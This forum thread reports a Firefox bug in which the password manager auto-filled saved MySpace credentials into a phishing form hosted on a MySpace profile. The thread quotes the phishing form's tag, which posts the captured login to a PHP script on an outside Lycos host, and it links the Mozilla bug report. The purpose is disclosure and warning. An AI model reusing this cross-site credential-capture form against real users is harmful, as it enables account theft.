Firefox bug: Cross-Site Forms + Password Manager = Security Failure

[mandy]

A new bug in Firefox exposes the password manager to phishers on websites:

I was shocked today to find an in-the-wild phish that uses nothing more than
cross-site forms, and also extracts information from the Password Manger! 

The underlying method was so obvious that it should have raised multiple
warnings.  There were none at all.

It was in a MySpace profile that included this tag:

Code:

<form name="2" action="http://membres.lycos.fr/adel88duran/plaguedoctor.php"
method="post">

What followed was a nearly perfect-looking MySpace login form that used simple
HTML and absolute positioning.

Not only did FireFox fail to raise a warning, it auto-filled my www.myspace.com
username and password into this form!!  I hope anyone reading this realizes it
is a security failure for the browser to auto-fill the membres.lycos.fr form
with credentials from another website...

full bug report: https://bugzilla.mozilla.org/show_bug.cgi?id=360493

This bug helped phishers to compromise MySpace accounts late last month:

Phishers compromise MySpace accounts with fake login form on MySpace's own site
http://community.tuliptools.com/index.ph...667.0.html

[BellisimaJ.]

Mozilla, take this, damn it!  

Song: "I used to love you (sic;Firefox)!"